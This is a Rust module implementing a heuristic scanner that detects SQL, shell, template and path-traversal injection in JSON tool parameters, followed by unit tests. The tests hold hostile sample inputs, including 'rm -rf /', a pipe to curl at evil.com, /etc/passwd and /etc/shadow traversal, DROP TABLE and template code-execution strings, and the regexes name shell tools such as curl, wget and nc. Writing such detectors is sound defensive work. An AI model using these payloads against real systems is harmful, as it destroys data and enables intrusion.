//! Payload scanner — injection detection in tool parameters.

use regex::Regex;
use std::sync::LazyLock;

/// Heuristic, case-insensitive matcher for SQL injection fragments.
///
/// A text is flagged when it contains any of:
/// - a SQL verb (`union`, `select`, `insert`, `update`, `delete`, `drop`, `alter`, `exec`,
///   `execute`) followed later by a clause keyword (`from`, `into`, `table`, `where`, `set`);
/// - a `--` comment marker anywhere in the text;
/// - a `;` followed later by `drop`, `delete` or `update`.
///
/// The `s` flag makes `.` match `\n` as well. SQL treats a newline as ordinary whitespace, so
/// without it a payload such as `"SELECT *\nFROM users"` would slip past the scanner.
static SQL_INJECTION: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(r"(?is)(\b(union|select|insert|update|delete|drop|alter|exec|execute)\b.*\b(from|into|table|where|set)\b|--|;.*\b(drop|delete|update)\b)")
        .expect("SQL_INJECTION is a valid static regex")
});

/// Heuristic matcher for shell command injection.
///
/// A text is flagged when a shell metacharacter (`;`, `&`, `|`, a backtick or `$`) is followed,
/// after optional whitespace, by one of a fixed list of command names. Matching is
/// case-sensitive.
///
/// An optional `(` is accepted between the metacharacter and the command so that command
/// substitution (`$(curl ...)`) and subshells (`; (rm ...)`) are caught; without it the `$`
/// trigger could never match the `$(cmd)` form it is there for.
static SHELL_INJECTION: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(
        r"[;&|`$]\s*\(?\s*(rm|cat|curl|wget|nc|bash|sh|python|perl|ruby|chmod|chown)\b",
    )
    .expect("SHELL_INJECTION is a valid static regex")
});

/// Heuristic matcher for server-side template injection.
///
/// A text is flagged when it contains any of:
/// - a Jinja2/Twig style `{{ ... }}` whose body contains `.`, `__`, `config`, `self` or
///   `request`;
/// - an ERB style `<% ... %>` block with any body;
/// - a `${ ... }` whose body contains `.`, `Runtime`, `Process` or `exec`.
///
/// A plain `${name}` placeholder without those markers is deliberately not flagged.
///
/// The `s` flag makes `.` match `\n`, so a template expression that spans several lines is
/// still detected instead of being hidden by a line break inside the delimiters.
static TEMPLATE_INJECTION: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(
        r"(?s)\{\{.*(\.|__|config|self|request).*\}\}|<%.*%>|\$\{.*(\.|Runtime|Process|exec).*\}",
    )
    .expect("TEMPLATE_INJECTION is a valid static regex")
});

/// Heuristic, case-insensitive matcher for directory traversal sequences.
///
/// A text is flagged when it contains either:
/// - two "dots" followed by a path separator, where each dot may be literal (`.`) or
///   percent-encoded (`%2e`) and the separator may be `/`, `\`, `%2f` or `%5c` — this covers
///   partially encoded forms such as `..%2f`, `%2e./` and `.%2e\`;
/// - the fully encoded pair `%2e%2e`, regardless of what follows.
static PATH_TRAVERSAL: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(r"(?i)(?:\.|%2e){2}(?:/|\\|%2f|%5c)|%2e%2e")
        .expect("PATH_TRAVERSAL is a valid static regex")
});

/// Maximum JSON nesting depth the scanner descends into.
///
/// The top-level value is at depth 0. `walk` returns without inspecting any value whose depth
/// is greater than this limit, which bounds the recursion on deeply nested payloads; strings
/// nested deeper than the limit are therefore not scanned.
const MAX_SCAN_DEPTH: usize = 64;

/// Scans every string value reachable from `params` for injection patterns.
///
/// Returns a short static label naming the first threat encountered during the walk, or
/// `None` when no scanned string matches any pattern.
#[must_use]
pub fn scan(params: &serde_json::Value) -> Option<&'static str> {
    // The walk starts at depth 0 and records the first hit in `threat`.
    let mut threat: Option<&'static str> = None;
    walk(params, &mut threat, 0);
    threat
}

/// Recursively walks a JSON value and scans its string leaves.
///
/// * `value`  – the node to inspect.
/// * `result` – out-parameter holding the first threat label found; once it is `Some`, the
///   walk does no further work.
/// * `depth`  – nesting depth of `value` (the root is 0).
///
/// Only string *values* are scanned; object keys, numbers, booleans and `null` are ignored.
/// Values nested deeper than `MAX_SCAN_DEPTH` are skipped without being reported.
fn walk(value: &serde_json::Value, result: &mut Option<&'static str>, depth: usize) {
    // Stop if a threat was already recorded, or if descending further would exceed the
    // recursion bound that protects against stack overflow on deeply nested payloads.
    if result.is_some() || depth > MAX_SCAN_DEPTH {
        return;
    }
    match value {
        serde_json::Value::String(text) => *result = scan_text(text),
        serde_json::Value::Array(items) => {
            for item in items {
                walk(item, result, depth + 1);
                if result.is_some() {
                    break; // No need to visit the remaining elements.
                }
            }
        }
        serde_json::Value::Object(map) => {
            for child in map.values() {
                walk(child, result, depth + 1);
                if result.is_some() {
                    break; // No need to visit the remaining members.
                }
            }
        }
        _ => {} // Numbers, bools, null — nothing to scan.
    }
}

#[inline]
fn scan_text(text: &str) -> Option<&'static str> {
    if SQL_INJECTION.is_match(text) {
        return Some("SQL injection pattern");
    }
    if SHELL_INJECTION.is_match(text) {
        return Some("shell injection pattern");
    }
    if TEMPLATE_INJECTION.is_match(text) {
        return Some("template injection pattern");
    }
    if PATH_TRAVERSAL.is_match(text) {
        return Some("path traversal pattern");
    }
    None
}

#[cfg(test)]
mod tests {
    use super::*;
    use serde_json::{json, Value};

    /// Asserts that scanning `params` reports a threat whose label contains `needle`.
    fn assert_threat(params: &Value, needle: &str) {
        let label = scan(params).expect("expected a threat to be reported");
        assert!(label.contains(needle), "unexpected threat label: {label}");
    }

    /// Wraps `leaf` in `levels` single-key objects, so the leaf ends up at depth `levels`.
    fn nest(leaf: Value, levels: usize) -> Value {
        (0..levels).fold(leaf, |inner, _| json!({ "nested": inner }))
    }

    #[test]
    fn detect_sql_injection() {
        let params =
            json!({"query": "SELECT * FROM users WHERE id=1 UNION SELECT * FROM passwords"});
        assert_threat(&params, "SQL");
    }

    #[test]
    fn detect_shell_injection() {
        assert_threat(&json!({"cmd": "hello; rm -rf /"}), "shell");
    }

    #[test]
    fn detect_path_traversal() {
        assert_threat(&json!({"path": "../../../etc/passwd"}), "path traversal");
    }

    #[test]
    fn clean_params_pass() {
        let params = json!({"name": "hello world", "count": 42});
        assert!(scan(&params).is_none());
    }

    #[test]
    fn detect_template_injection() {
        assert_threat(&json!({"input": "{{config.items()}}"}), "template");
    }

    #[test]
    fn allow_benign_template_literal() {
        let params = json!({"msg": "Hello ${username}, welcome!"});
        assert!(scan(&params).is_none());
    }

    #[test]
    fn detect_nested_injection() {
        let params = json!({
            "outer": {
                "inner": {
                    "deep": "hello; rm -rf /"
                }
            }
        });
        assert_threat(&params, "shell");
    }

    #[test]
    fn detect_injection_in_array() {
        let params = json!({
            "items": [
                "safe",
                "also safe",
                "SELECT * FROM users WHERE 1=1 UNION SELECT * FROM passwords"
            ]
        });
        assert_threat(&params, "SQL");
    }

    #[test]
    fn non_string_values_pass() {
        let params = json!({
            "count": 42,
            "active": true,
            "data": null,
            "scores": [1, 2, 3]
        });
        assert!(scan(&params).is_none());
    }

    #[test]
    fn empty_params_pass() {
        assert!(scan(&json!({})).is_none());
        assert!(scan(&json!(null)).is_none());
        assert!(scan(&json!([])).is_none());
    }

    #[test]
    fn detect_backslash_path_traversal() {
        assert_threat(&json!({"path": "..\\..\\windows\\system32"}), "path traversal");
    }

    #[test]
    fn detect_url_encoded_traversal() {
        assert_threat(&json!({"path": "%2e%2e/etc/passwd"}), "path traversal");
    }

    #[test]
    fn detect_uppercase_url_encoded_traversal() {
        assert_threat(&json!({"path": "%2E%2E/etc/shadow"}), "path traversal");
    }

    #[test]
    fn detect_mixed_case_url_encoded_traversal() {
        assert_threat(&json!({"path": "%2e%2E/%2E%2e/etc/passwd"}), "path traversal");
    }

    #[test]
    fn detect_erb_template() {
        assert_threat(&json!({"input": "<%= system('id') %>"}), "template");
    }

    #[test]
    fn detect_sql_drop_table() {
        assert_threat(&json!({"q": "1; DROP TABLE users"}), "SQL");
    }

    #[test]
    fn detect_shell_pipe() {
        assert_threat(&json!({"cmd": "data| curl http://evil.com"}), "shell");
    }

    #[test]
    fn detect_shell_backtick() {
        assert_threat(&json!({"cmd": "file`rm /tmp/data`"}), "shell");
    }

    #[test]
    fn detect_jinja2_self_access() {
        assert_threat(&json!({"tpl": "{{self.__class__.__mro__}}"}), "template");
    }

    #[test]
    fn deep_nesting_aborts_at_limit() {
        // 70 levels of nesting exceeds MAX_SCAN_DEPTH (64), so the leaf is never scanned.
        let val = nest(json!("hello; rm -rf /"), 70);
        assert!(scan(&val).is_none());
    }

    #[test]
    fn deep_nesting_within_limit_detected() {
        // 60 levels of nesting is within MAX_SCAN_DEPTH (64), so the leaf is scanned.
        let val = nest(json!("hello; rm -rf /"), 60);
        assert!(scan(&val).is_some());
    }

    #[test]
    fn depth_limit_boundary() {
        // A leaf exactly at MAX_SCAN_DEPTH is still scanned; one level deeper is skipped.
        let at_limit = nest(json!("hello; rm -rf /"), MAX_SCAN_DEPTH);
        assert_threat(&at_limit, "shell");

        let past_limit = nest(json!("hello; rm -rf /"), MAX_SCAN_DEPTH + 1);
        assert!(scan(&past_limit).is_none());
    }

    #[test]
    fn detect_encoded_double_traversal() {
        // Two consecutive percent-encoded `..` segments with mixed-case hex digits.
        assert_threat(&json!({"path": "%2E%2e/%2e%2E/sensitive"}), "path traversal");
    }

    #[test]
    fn detect_sql_with_comments() {
        // Comment-based injection: the trailing `--` comments out the rest of the query.
        assert_threat(&json!({"user": "admin' --"}), "SQL");
    }

    #[test]
    fn large_clean_payload_passes() {
        // A large clean payload must not produce a false positive.
        let big_text = "a".repeat(100_000);
        let params = json!({"data": big_text});
        assert!(scan(&params).is_none());
    }

    #[test]
    fn short_circuit_on_first_threat() {
        // Both a SQL and a shell payload are present; which one is reported depends on the
        // map iteration order, but exactly one of the two labels must come back.
        let params = json!({
            "a": "SELECT * FROM users WHERE 1=1 UNION SELECT * FROM passwords",
            "b": "hello; rm -rf /"
        });
        assert!(matches!(
            scan(&params),
            Some("SQL injection pattern" | "shell injection pattern")
        ));
    }
}